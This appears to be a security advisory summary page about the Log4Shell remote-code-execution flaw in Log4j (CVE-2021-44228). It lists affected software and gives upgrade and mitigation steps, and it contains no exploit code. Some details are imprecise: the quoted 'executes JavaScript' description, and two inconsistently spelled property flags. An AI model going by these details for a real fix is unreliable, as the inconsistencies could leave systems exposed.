log4j trivial RCE (similar to ShellShock) - "Log4Shell" CVE-2021-44228
|
Summary (Dan Goodin): Log4j takes a log message, interprets it as a URL and goes out and fetches it. It will even execute JavaScript in URLs with full privileges of the main program. Exploits are triggered inside log messages using the ${} syntax. Easy peasy. Who is affected: - Servers and clients that run Java and also log anything using the log4j framework - log4j 2.x confirmed, and probably log4j 1.x also - Don't forget appliances that use Java server components - Downstream projects that include log4j, including Apache Struts, Solr, etc. Required to fully mitigate: - Upgrade Log4j 2.15.0 - requires Java 8 Exploitation: active: Mitigations - easiest: - (@MalwareTechBlog): If you can't upgrade log4j, you can mitigate the RCE vulnerability by setting log4j2.formatMsgNoLookups to True (-Dlog4j2.formatMsgNoLookups=true in JVM command line). Mitigations - official project itself (https://logging.apache.org/log4j/2.x/) >Users of Log4j 2.10 or greater may add -Dlog4j.formatMsgNoLookups=true as a command line option or add log4j.formatMsgNoLookups=true to a log4j2.component.properties file on the classpath to prevent lookups in log event messages. >Users since Log4j 2.7 may specify %m{nolookups} in the PatternLayout configuration to prevent lookups in log event messages. >Remove the JndiLookup and JndiManager classes from the log4j-core jar. Removal of the JndiManager will cause the JndiContextSelector and JMSAppender to no longer function. Mitigations - harder: - WAF to limit exploit queries - egress filtering to block unexpected outbound traffic Exploit detection: Good threads and summaries: - https://cert.at/de/warnungen/2021/12/kritische-0-day-sicherheitslucke-in-apache-log4j-bibliothek (German) -- Royce Williams Tech Solvency
|
|
|